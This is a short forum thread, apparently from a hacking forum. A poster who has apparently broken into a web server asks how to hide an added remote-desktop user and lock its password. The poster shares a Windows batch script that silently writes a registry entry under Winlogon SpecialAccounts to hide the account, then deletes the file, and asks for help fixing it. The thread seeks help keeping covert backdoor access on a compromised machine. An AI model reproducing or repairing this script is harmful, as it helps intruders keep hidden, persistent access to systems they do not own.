Please help me
Please help me
you didn't hack it if you cant work out how to add a rdp user lol...
you need admin to add users, if someone runs the webserver as administrator they really shouldnt use a webserver and its an unlikely event
I can add user if you have any user that have administrator privillege.
But only want me need to know is that, How to make user invisible and to make user not to have privillege to change pasword
I tried your comment and it never help, but I tried to use google and I found the commad below but still the user is not hidden in the computer management, can you please help me to look into the command and see what is missing so that i can re-create the batch file.
Thanks for your contribution.
@echo off
echo Windows Registry Editor Version 5.00>win.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]>>win.reg
echo "YourHiddenUser"=dword:00000000>>win.reg
REGEDIT /S win.REG
DEL /Q win.REG
There are currently 1 users browsing this thread. (0 members and 1 guests)